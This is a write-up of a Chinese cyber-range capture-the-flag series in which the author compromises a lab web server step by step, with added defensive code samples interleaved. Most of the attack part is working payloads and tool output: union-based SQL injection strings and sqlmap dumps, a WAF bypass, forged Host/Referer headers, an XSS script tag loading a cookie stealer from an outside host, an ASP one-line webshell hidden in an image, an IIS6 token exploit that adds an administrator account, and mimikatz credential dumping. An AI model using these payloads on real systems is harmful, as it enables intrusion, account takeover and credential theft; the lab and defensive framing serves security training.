[封神台 (Fengshentai) - Zhangkong Security Range] Yuri's Revenge: Xiaofang!
Chapter 1: For the goddess Xiaofang! SQL injection attack principles, hands-on drill
1. Determining whether a SQL injection vulnerability exists
?id=1'
Page does not display normally
?id=1 and 1=1
?id=1 and 1=2
The page response is abnormal, so an integer-type (unquoted) injection point exists
2. Determining the number of columns
?id=1 and 1=1 order by 1
?id=1 and 1=1 order by 2
?id=1 and 1=1 order by 3
?id=1 order by 1
?id=1 order by 2
?id=1 order by 3
order by 3 returns an error, so the column count is 2
3. Finding the echo (display) positions
?id=1 and 1=2 union select 1,2
4. The actual injection
?id=1 and 1=2 union select 1,version()
5.5.53
?id=1 and 1=2 union select 1,database()
maoshe
the current database
?id=1 and 1=2 union select 1,table_name from information_schema.tables where table_schema=database() limit 0,1
admin
Enumerate the columns
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1
Id
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 1,1
username
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 2,1
password
?id=1 and 1=2 union select 1,column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 3,1
Nothing returned, so the admin table has three columns: id, username, password
Read the column contents
?id=1 and 1=2 union select 1,username from admin limit 0,1
admin
?id=1 and 1=2 union select 1,username from admin limit 1,1
ppt领取微信
?id=1 and 1=2 union select 1,password from admin limit 0,1
hellohack
This is the flag
?id=1 and 1=2 union select 1,password from admin limit 1,1
zkaqbanban
Two users with their two passwords
A more direct way
?id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
admin,dirs,news,xss
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'
Id,username,password
?id=1 and 1=2 union select 1,group_concat(id,username,password) from admin
1adminhellohack,2ppt领取微信zkaqbanban
?id=1 and 1=2 union select 1,group_concat(id,0x40,username,0x3a,password) from admin
1@admin:hellohack,2@ppt领取微信:zkaqbanban
At this point it could already be over
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='dirs'
paths
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='news'
id,content
?id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='xss'
id,user,pass
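To show the difference between the unquoted id lookup this chapter exploits and a parameterised one, here is an added example (not the range's code) that builds an in-memory SQLite stand-in for the maoshe schema and runs the same three probes against a vulnerable and a hardened lookup. Table and column names come from the write-up; the row values and the SQLite-for-MySQL substitution are assumptions.

```python
import sqlite3

# Added example, not the range's code. In-memory SQLite stand-in for the 'maoshe'
# schema of chapter 1 (table and column names from the write-up, row values are
# placeholders). SQLite accepts the same UNION and "LIMIT offset,count" syntax the
# probes use, so the behaviour carries over from MySQL.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news(id INTEGER, content TEXT);
        INSERT INTO news VALUES (1, 'first post'), (2, 'second post');
        CREATE TABLE admin(Id INTEGER, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'placeholder-secret');
    """)
    return conn

def vulnerable_lookup(conn, raw_id):
    # The bug class behind chapter 1: the id parameter is pasted into the SQL text
    # without quotes (an integer-type injection point), so "and 1=2 union select"
    # becomes part of the statement the DBMS parses.
    sql = "SELECT id, content FROM news WHERE id=" + raw_id
    return conn.execute(sql).fetchall()

def safe_lookup(conn, raw_id):
    # Hardened form: parse the integer first, then bind it as a parameter. The raw
    # text never reaches the SQL parser, so every probe is refused up front.
    try:
        id_value = int(raw_id)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return conn.execute("SELECT id, content FROM news WHERE id=?", (id_value,)).fetchall()

def probe(lookup, conn):
    # Run the chapter 1 probes through a lookup and record what each returned,
    # or "rejected" when the lookup refused the input.
    probes = {
        "true":  "1 and 1=1",
        "false": "1 and 1=2",
        "union": "1 and 1=2 union select 1,username from admin limit 0,1",
    }
    results = {}
    for name, payload in probes.items():
        try:
            results[name] = lookup(conn, payload)
        except (ValueError, sqlite3.Error):
            results[name] = "rejected"
    return results

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe(vulnerable_lookup, db))
    print("hardened:  ", probe(safe_lookup, db))
```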
5. Automated SQL injection
Payload:
python sqlmap.py http://59.63.200.79:8003/?id=1
python sqlmap.py http://59.63.200.79:8003/?id=1 --dbs
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe --tables
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin --columns
python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C username,password --dump
Full run:
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1
___
__H__
___ ___[']_____ ___ ___ {1.4.8.10#dev}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:18:23 /2020-08-16/
[17:18:26] [INFO] resuming back-end DBMS 'mysql'
[17:18:26] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:18:26] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:18:26] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:18:26 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 --dbs
[*] starting @ 17:21:36 /2020-08-16/
[17:21:36] [INFO] resuming back-end DBMS 'mysql'
[17:21:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:21:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:21:37] [INFO] fetching database names
[17:21:37] [INFO] fetching number of databases
[17:21:37] [INFO] resumed: 3
[17:21:37] [INFO] resumed: information_schema
[17:21:37] [INFO] resumed: maoshe
[17:21:37] [INFO] resumed: test
available databases [3]:
[*] information_schema
[*] maoshe
[*] test
[17:21:37] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:21:37 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe --tables
[*] starting @ 17:21:55 /2020-08-16/
[17:21:55] [INFO] resuming back-end DBMS 'mysql'
[17:21:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:21:56] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:21:56] [INFO] fetching tables for database: 'maoshe'
[17:21:56] [INFO] fetching number of tables for database 'maoshe'
[17:21:56] [INFO] resumed: 4
[17:21:56] [INFO] resumed: admin
[17:21:56] [INFO] resumed: dirs
[17:21:56] [INFO] resumed: news
[17:21:56] [INFO] resumed: xss
Database: maoshe
[4 tables]
+-------+
| admin |
| dirs |
| news |
| xss |
+-------+
[17:21:56] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:21:56 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin --columns
[*] starting @ 17:22:39 /2020-08-16/
[17:22:39] [INFO] resuming back-end DBMS 'mysql'
[17:22:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:22:39] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:22:39] [INFO] fetching columns for table 'admin' in database 'maoshe'
[17:22:39] [INFO] resumed: 3
[17:22:39] [INFO] resumed: Id
[17:22:39] [INFO] resumed: int(11)
[17:22:39] [INFO] resumed: username
[17:22:39] [INFO] resumed: varchar(11)
[17:22:39] [INFO] resumed: password
[17:22:39] [INFO] resumed: varchar(11)
Database: maoshe
Table: admin
[3 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| Id | int(11) |
| password | varchar(11) |
| username | varchar(11) |
+----------+-------------+
[17:22:39] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:22:39 /2020-08-16/
C:\Python27\sqlmap>python sqlmap.py http://59.63.200.79:8003/?id=1 -D maoshe -T admin -C username,password --dump
[*] starting @ 17:23:43 /2020-08-16/
[17:23:43] [INFO] resuming back-end DBMS 'mysql'
[17:23:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 2945=2945
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 8155 FROM (SELECT(SLEEP(5)))osRC)
---
[17:23:43] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[17:23:43] [INFO] fetching entries of column(s) 'password, username' for table 'admin' in database 'maoshe'
[17:23:43] [INFO] fetching number of column(s) 'password, username' entries for table 'admin' in database 'maoshe'
[17:23:43] [INFO] resumed: 2
[17:23:43] [INFO] resumed: hellohack
[17:23:43] [INFO] resumed: admin
[17:23:43] [INFO] resumed: zkaqbanban
[17:23:43] [INFO] resumed: ppt领取微信
Database: maoshe
Table: admin
[2 entries]
+----------+------------+
| username | password |
+----------+------------+
| admin | hellohack |
| ppt领取微信 | zkaqbanban |
+----------+------------+
[17:23:43] [INFO] table 'maoshe.admin' dumped to CSV file 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79\dump\maoshe\admin.csv'
[17:23:43] [INFO] fetched data logged to text files under 'C:\Users\Nah\AppData\Local\sqlmap\output\59.63.200.79'
[*] ending @ 17:23:43 /2020-08-16/
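As an added detection example (not part of the write-up or of sqlmap), the following scans constructed web-server access-log lines for the manual probes of this chapter, for the SLEEP() time-based payload and default User-Agent that sqlmap shows above, and for the "+"-for-space variant used in the next chapter. The combined log format, the TEST-NET client addresses and the sqlmap User-Agent string are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Added example, not from the write-up or sqlmap. Flags access-log lines carrying
# boolean 'and 1=x' pairs, ORDER BY column counting, UNION SELECT, reads of
# information_schema, MySQL SLEEP() and sqlmap's default User-Agent. The query
# is decoded with unquote_plus first, so '+' used in place of spaces is normalised.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

SIGNATURES = [
    ("boolean-probe", re.compile(r"\band\s+1\s*=\s*[12]\b", re.I)),
    ("column-count",  re.compile(r"\border\s+by\s+\d+\b", re.I)),
    ("union-select",  re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema-read",   re.compile(r"\binformation_schema\.", re.I)),
    ("time-blind",    re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
]

def classify(line):
    # (ip, url, [reasons]) for one line, or None when it is clean or does not parse.
    m = LOG_RE.match(line)
    if not m:
        return None
    query = unquote_plus(m.group("url").partition("?")[2])
    reasons = [name for name, rx in SIGNATURES if rx.search(query)]
    if m.group("ua").lower().startswith("sqlmap/"):
        reasons.append("sqlmap-ua")
    return (m.group("ip"), m.group("url"), reasons) if reasons else None

def suspicious_sources(lines):
    # Aggregate hits per client IP: {ip: sorted list of reasons}.
    hits = {}
    for line in lines:
        found = classify(line)
        if found:
            hits.setdefault(found[0], set()).update(found[2])
    return {ip: sorted(r) for ip, r in hits.items()}

# Constructed sample lines (TEST-NET addresses); payloads mirror the write-up's.
SAMPLE_LOG = [
    '203.0.113.5 - - [16/Aug/2020:17:10:01 +0800] "GET /?id=1%20and%201=2%20union%20select%201,database() HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [16/Aug/2020:17:10:02 +0800] "GET /?id=1%20order%20by%203 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [16/Aug/2020:17:10:03 +0800] "GET /?id=1%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables HTTP/1.1" 200 600 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [16/Aug/2020:17:21:37 +0800] "GET /?id=1%20AND%20(SELECT%208155%20FROM%20(SELECT(SLEEP(5)))osRC) HTTP/1.1" 200 512 "-" "sqlmap/1.4.8.10#dev (http://sqlmap.org)"',
    '203.0.113.9 - - [16/Aug/2020:17:30:00 +0800] "GET /?id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [16/Aug/2020:17:31:00 +0800] "GET /?id=2 HTTP/1.1" 200 480 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, reasons in suspicious_sources(SAMPLE_LOG).items():
        print(ip, reasons)
```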
Chapter 2: Hitting obstacles! Bypassing WAF filtering! SQL injection attack principles, hands-on drill
?id=171
?id=171 order by 10
// order by 11 errors (x)
id=171 union select 1,2,3,4,5,6,7,8,9,10 from admin
// blocked by the WAF
id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
+ replaces the space
Positions 2, 3, 7, 8, 9 are echoed
The admin table exists, and "from admin" must be appended, otherwise an error is raised
id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
Account: admin
Password: b9a2a2b5dffb918c
After MD5 decryption (hash lookup): welcome
Log in to the back end at /admin
zkz{welcome-control}
Chapter 3: This back end can identify the visitor
- http://59.63.200.79:8004/admin/default.asp
- http://59.63.200.79:8004/admin123/
对不起,为了系统安全,不允许从外部链接地址访问本系统的后台管理页面。
访问者的Curl(host)为:
http://59.63.200.79:81/admin123/sysadmin_view.asp
访问者的Comeurl(referer)为:
http://59.63.200.79:8004/admin123/
- Key points:
Visit admin123/sysadmin_view.asp
Modify Host and Referer so the request is forged as internal access (the Referer's ip and port only need to match the Host's ip and port)
Refresh the page; four requests are captured, and the last one is the one we need
Change both port numbers to 81
Render
zkz{fuzz-666}
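An added example, not the range's code, that models the check this back end performs (Referer ip:port equal to Host ip:port) and why matching request headers cannot establish "internal" access, beside a replacement that decides on server-side facts. The LAN prefixes and the Request fields are assumptions.

```python
from dataclasses import dataclass

# Added example, not the range's code. Models the chapter 3 back-end check: the
# page accepts a visit as "internal" when the Referer (its "Comeurl") carries the
# same ip:port as the Host header (its "Curl"). Both values arrive in the request,
# so the forged pair from the write-up passes. The replacement decides on the
# server-side session role and the TCP peer address instead, which the client
# cannot type into a header.

INTERNAL_NETS = ("127.", "192.168.")   # assumed LAN prefixes of the range host

def weak_internal_check(headers):
    # The write-up's rule: Referer host:port must equal Host host:port.
    referer = headers.get("Referer", "")
    host = headers.get("Host", "")
    referer_hostport = referer.split("://", 1)[-1].split("/", 1)[0]
    return referer_hostport != "" and referer_hostport == host

@dataclass
class Request:
    headers: dict
    peer_ip: str        # taken from the accepted socket, not from any header
    session_role: str   # resolved server-side from the session cookie

def hardened_admin_check(req):
    # Authorise the admin page on facts the client cannot forge: an admin session
    # and a connection that really originates inside the allowed network.
    if req.session_role != "admin":
        return False
    return req.peer_ip.startswith(INTERNAL_NETS)

if __name__ == "__main__":
    forged = {"Host": "59.63.200.79:81", "Referer": "http://59.63.200.79:81/admin123/"}
    print("weak check accepts forged headers:", weak_internal_check(forged))
    print("hardened check:", hardened_admin_check(Request(forged, "203.0.113.5", "anonymous")))
```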
Chapter 3: Brute-forcing the administrator account to log in to the back end; Burp against payment and brute-force, hands-on drill
http://59.63.200.79:8003/dami_zhifu/dami_baopo/index.php
http://59.63.200.79:8003/dami_zhifu/dami_baopo/admin.php
Common usernames do not exist or are disabled
Guessed the username zkaq, which is correct
Capture with Burp and brute-force the password, watching the response length
Username and password are both zkaq
flag{s_q_gjrm}
Chapter 4: For more privileges! The message board! Cookie forgery for the target's privileges, hands-on drill
https://xsspt.com/index.php?do=login
<script src=https://xsspt.com/nxqPZY?1597410463></script>
cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC;
flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
zkz{xsser-g00d}
Chapter 5: Advance! Getting the highest web privileges! Bypassing protections to upload a webshell, hands-on drill
Hints:
1. Log in to the back end by modifying the Cookie (if it doesn't work, redo it)
2. Upload a SHELL!
3. The Flag is in the site root directory (flag.php)
4. When uploading an image, upload a small file; I suggest a QQ emoticon
Through XSS Yuri finally obtained the administrator's Cookie; after modifying the cookie he bypassed the login password directly and saw the back-end functions! What to do next is find an upload point and upload his own shell!
The cookie captured earlier with Burp also works
ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
Put it into the cookie
Chrome
Firefox
Click "Are you ready"
Microsoft-IIS/6.0
IIS parsing vulnerabilities may exist:
- Directory parsing: every file inside a folder named *.asp is executed as an ASP file.
- File parsing: for a malformed filename like *.asp;.jpg, everything after the ";" is ignored, so it is executed as an *.asp file.
- Besides asp, the default executable extensions of IIS 6.0 also include these three: *.asa *.cer *.cdx
Check the upload directory and the upload file restrictions
Identify the upload directory
Other places are the same; the prompt says the description was not filled in
The correct upload point
asp.php
<%eval request ("a")%>
Make an image webshell
copy 1.php + 1.png 2.png
A large one doesn't seem to work; used this small emoticon and renamed it to 1.cer
Cute or what???
Rename it to 1.cer and upload
Painful: at first I was looking for where the uploaded file went and what its filename actually was. Couldn't upload all evening; at first I hadn't clicked upload, and later the image webshell I had made could not be uploaded
Made a new one, and the upload succeeded
Copy the upload name it gives you, the one that contains your real upload time
zkz{G3t_the_admin!Sh3ll}
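An added example (not the range's code) of the upload validation that would close the three IIS 6.0 parsing paths listed above and reject the copy-made image webshell by checking the content, not just the name. The extension allowlist, the reason strings and the minimal PNG sample are constructed.

```python
import posixpath
import struct
import zlib

# Added example, not the range's code. Upload validation that closes the three IIS
# 6.0 parsing paths listed above (';' in the name, the .asa/.cer/.cdx extensions,
# a directory named *.asp) and refuses the "image webshell" trick: a file claiming
# to be PNG/JPEG must start with that format's magic bytes and, for PNG, must end
# at the IEND chunk with nothing appended after it.

EXECUTABLE_EXT = {".asp", ".asa", ".cer", ".cdx", ".aspx", ".php"}
ALLOWED = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff"}

def reject_reason(filename, content):
    # Returns None when the upload is acceptable, otherwise a short reason.
    name = filename.replace("\\", "/").lower()
    if ";" in name or "\x00" in name:
        return "separator in filename"
    parts = name.split("/")
    for segment in parts[:-1]:
        if posixpath.splitext(segment)[1] in EXECUTABLE_EXT:
            return "executable directory name"
    base = parts[-1]
    if base.count(".") != 1:
        return "multiple or missing extensions"
    ext = posixpath.splitext(base)[1]
    if ext in EXECUTABLE_EXT:
        return "executable extension"
    if ext not in ALLOWED:
        return "extension not on allowlist"
    if not content.startswith(ALLOWED[ext]):
        return "content does not match extension"
    if ext == ".png":
        iend = content.find(b"IEND")
        if iend == -1 or len(content) > iend + 8:   # 'IEND' + 4-byte CRC ends a PNG
            return "trailing data after PNG IEND"
    return None

def _chunk(kind, data):
    # PNG chunk: length, type, data, CRC32 over type+data
    return struct.pack(">I", len(data)) + kind + data + struct.pack(">I", zlib.crc32(kind + data) & 0xFFFFFFFF)

# Constructed 1x1 PNG header with no IDAT: enough for the checks above, not a renderable image.
MINI_PNG = (b"\x89PNG\r\n\x1a\n"
            + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 6, 0, 0, 0))
            + _chunk(b"IEND", b""))

if __name__ == "__main__":
    for fname, body in [("1.cer", MINI_PNG), ("x.asp;.jpg", b"\xff\xd8\xff"),
                        ("1.png", MINI_PNG + b"<%placeholder%>"), ("1.png", MINI_PNG)]:
        print(fname, "->", reject_reason(fname, body) or "accepted")
```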
Chapter 6: SYSTEM! POWER! Controlling the target through the webshell, hands-on drill
Hints:
1. Escalate privileges!
2. The FLAG is in the root directory of the C drive!
Yuri chuckled: a simple Win2003 box; as soon as he gets SYSTEM privileges he can go show off to the goddess Xiaofang...
Portal
C
AntSword's virtual terminal did not work; it kept returning access denied
Switched to the genuine China Chopper (菜刀), chose asp and GB2312
The command shown right after connecting
netstat -an | find "ESTABLISHED"
First of all, whoami
发生系统错误 5。
拒绝访问。
Virtual terminal before privilege escalation
whoami
nt authority\network service
What to do next is
net user username password /add
At this point the privileges are insufficient,
because cmd needs the external interface wscript.shell.
But wscript.shell is on the C drive, which we still cannot access. So use a pre-assembled wscript.shell, namely iis6.exe.
Privilege escalation command sequence
iis6.exe "whoami"
// this exploit gives you a local system shell: a command line with SYSTEM privileges
iis6.exe "whoami"
// confirm identity and privileges once more
iis6.exe "net user 1 1 /add"
// the added user (account 1, password 1) is actually in the ordinary Users group
iis6.exe "net user 1"
// view the user's information
iis6.exe "net localgroup Administrators 1 /add"
// add the user to the Administrators group
tasklist -svc // find the Remote Desktop service TermService, i.e. the PID of svchost.exe 2444 TermService
netstat -ano // find the port number from the PID above
Use the Windows built-in Remote Desktop Connection to access the host with the port number: ip:port.
Remote Desktop is a program that occupies a port number. That port is really the service software's port, and the ip denotes this server machine; to talk to the Remote Desktop service on the server, you have to switch the port to the one it occupies.
You can connect directly via Win+R
mstsc /v:IP:PORT
Or the traditional way
Got it wrong, try again
Actually, files can be uploaded here
Open My Computer from the Recycle Bin in the bottom-right corner
Chapter 7: GET THE PASS! Grabbing the administrator's plaintext password from process memory
After getting SYSTEM, Yuri was not satisfied. He planned to obtain the server administrator's password somehow, to collect password information for penetration in other directions, and incidentally send the password to Xiaofang to show off.
Unexpectedly, when Yuri saw the system's plaintext password... he was shocked... From then on, a new chapter of Yuri's life began
Right-click the file > Properties > Security > Advanced; there are 5 entries, select the two Deny entries, Edit, and clear all
Password-extraction tool: mimikatz, just search for it
privilege::debug ---- escalate privileges
sekurlsa::logonPasswords ---- get the logged-on users' passwords
Escalate privileges
privilege::debug
Get the logged-on users' passwords
sekurlsa::logonPasswords
Was the system changed?
It is the extraction password of the archive!!!
(It took me a really long time)
wow!yougotit!
zkz{F3ck_power_3y3stem}
The concrete run
D:\05\UploadFiles\> iis6.exe "whoami"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[Try 2 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: whoami
[+]Done, command should have ran as SYSTEM!
nt authority\system
D:\05\UploadFiles\> iis6.exe "whoami"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: whoami
[+]Done, command should have ran as SYSTEM!
nt authority\system
D:\05\UploadFiles\> iis6.exe "net user 1 1 /add"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net user 1 1 /add
[+]Done, command should have ran as SYSTEM!
命令成功完成。
D:\05\UploadFiles\> iis6.exe "net user 1"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net user 1
[+]Done, command should have ran as SYSTEM!
用户名 1
全名
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2020-8-16 1:57
密码到期 2020-9-28 0:44
密码可更改 2020-8-16 1:57
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *Users
全局组成员 *None
命令成功完成。
D:\05\UploadFiles\> iis6.exe "net localgroup Administrators 1 /add"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 2192 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 2192
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net localgroup Administrators 1 /add
[+]Done, command should have ran as SYSTEM!
命令成功完成。
D:\05\UploadFiles\> iis6.exe "net user 1"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 876 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 876
[Try 1 time...]
[Try 2 time...]
[Try 3 time...]
[Try 4 time...]
D:\05\UploadFiles\> iis6.exe "net user 1"
[IIS6Up]-->IIS Token PipeAdmin golds7n Version
[IIS6Up]-->This exploit gives you a Local System shell
[IIS6Up]-->Set registry OK
[process walking]: 876 wmiprvse.exe
[IIS6Up]-->Got WMI process Pid: 876
[Try 1 time...]
[IIS6Up]-->Found token SYSTEM
[*]Running command with SYSTEM Token...
[*]Command: net user 1
[+]Done, command should have ran as SYSTEM!
用户名 1
全名
注释
用户的注释
国家(地区)代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2020-8-16 1:57
密码到期 2020-9-28 0:44
密码可更改 2020-8-16 1:57
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 从不
可允许的登录小时数 All
本地组成员 *Administrators *Users
全局组成员 *None
命令成功完成。
D:\05\UploadFiles\> tasklist -svc
映像名称 PID 服务
========================= ======== ============================================
System Idle Process 0 暂缺
System 4 暂缺
smss.exe 284 暂缺
csrss.exe 332 暂缺
winlogon.exe 356 暂缺
services.exe 404 Eventlog, PlugPlay
lsass.exe 416 HTTPFilter, PolicyAgent, ProtectedStorage,
SamSs
svchost.exe 608 DcomLaunch
svchost.exe 672 RpcSs
svchost.exe 728 Dhcp, Dnscache
svchost.exe 756 LmHosts, W32Time
svchost.exe 792 AeLookupSvc, Browser, CryptSvc, dmserver,
EventSystem, helpsvc, lanmanserver,
lanmanworkstation, Netman, Schedule,
seclogon, SENS, ShellHWDetection, TrkWks,
winmgmt, wuauserv, WZCSVC
spoolsv.exe 952 Spooler
msdtc.exe 980 MSDTC
httpd.exe 1112 Apache2a
svchost.exe 1144 ERSvc
inetinfo.exe 1200 IISADMIN
mysqld.exe 1256 MySQLa
svchost.exe 1960 RemoteRegistry
VGAuthService.exe 2020 VGAuthService
vmtoolsd.exe 2064 VMTools
svchost.exe 2324 W3SVC
svchost.exe 2444 TermService
dllhost.exe 2524 COMSysApp
w3wp.exe 2900 暂缺
wmiprvse.exe 3388 暂缺
logon.scr 3256 暂缺
httpd.exe 852 暂缺
wmiprvse.exe 876 暂缺
cmd.exe 1756 暂缺
tasklist.exe 1744 暂缺
D:\05\UploadFiles\> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 1112
TCP 0.0.0.0:81 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:82 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 416
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 980
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1256
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 2444
TCP 0.0.0.0:8021 0.0.0.0:0 LISTENING 1112
TCP 127.0.0.1:3306 127.0.0.1:4274 TIME_WAIT 0
